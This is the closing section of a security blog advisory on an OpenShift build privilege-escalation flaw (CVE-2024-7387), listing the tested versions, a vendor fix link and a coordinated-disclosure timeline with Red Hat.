<p>The vulnerability was found and verified using the application versions listed below:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>oc version                                                                                     
Client Version: 4.12.0-202405222205.p0.gd691257.assembly.stream.el8-d691257
Kustomize Version: v4.5.7
Server Version: 4.12.59
Kubernetes Version: v1.25.16+306a47e

oc get pod build-priv-esc-7-build <span class="nt">-o</span> json  | jq <span class="s2">".spec.containers[0].image"</span>
<span class="s2">"quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:77faaecb0f5e2d59fe9181800b029c9186ca30e2c57353f890ee5a04b41ee1d7"</span>
</code></pre></div></div>

<h1 id="fixes">Fixes</h1>
<p>See <a href="https://access.redhat.com/security/cve/CVE-2024-7387">RedHat - CVE-2024-7387</a> <code class="language-plaintext highlighter-rouge">Affected Packages and Issued Red Hat Security Errata</code></p>

<h1 id="timeline">Timeline</h1>
<ul>
  <li>2024-07-31: Vendor contacted via secalert@redhat.com, GPG encrypted</li>
  <li>2024-08-01: Vendor replied that they are working on the report and that they resevered CVE-2024-7387</li>
  <li>2024-08-16: Asked the vendor about an status update</li>
  <li>2024-08-26: Asked the vendor again about an status update</li>
  <li>2024-08-26: Vendor replied that they are still working on it and have no specific release date for the fix</li>
  <li>2024-09-12: Vendor informed me that the vulnerability info would be published on 2024-09-16</li>
  <li>2024-09-16: Vendor released public information about the vulnerability at https://access.redhat.com/security/cve/CVE-2024-7387</li>
  <li>2024-09-19: Vendor released fixed versions</li>
</ul>

  </div>

  <a class="u-url" href="/advisory/2024/10/02/openshift-build-docker-priv-esc.html" hidden></a>
</article>

      </div>
    </main><link id="fa-stylesheet" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.0.0/css/all.min.css">

<footer class="site-footer h-card">
  <data class="u-url" value="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
      </div>
      <div class="footer-col">
        <p>Posts about IT Security, pentesting and bug bounty hunting.</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"><li>
    <a rel="me" href="" target="_blank" title="">
      <span class="grey fa-brands fa- fa-lg"></span>
    </a>
  </li><li>
    <a rel="me" href="" target="_blank" title="">
      <span class="grey fa-brands fa- fa-lg"></span>
    </a>
  </li>
  <li>
    <a href="/feed.xml" target="_blank" title="Subscribe to syndication feed">
      <svg class="svg-icon grey" viewbox="0 0 16 16">
        <path d="M12.8 16C12.8 8.978 7.022 3.2 0 3.2V0c8.777 0 16 7.223 16 16h-3.2zM2.194
          11.61c1.21 0 2.195.985 2.195 2.196 0 1.21-.99 2.194-2.2 2.194C.98 16 0 15.017 0
          13.806c0-1.21.983-2.195 2.194-2.195zM10.606
          16h-3.11c0-4.113-3.383-7.497-7.496-7.497v-3.11c5.818 0 10.606 4.79 10.606 10.607z"
        />
      </svg>
    </a>
  </li>
</ul>
</div>

  </div>

</footer>

</body>

</html>
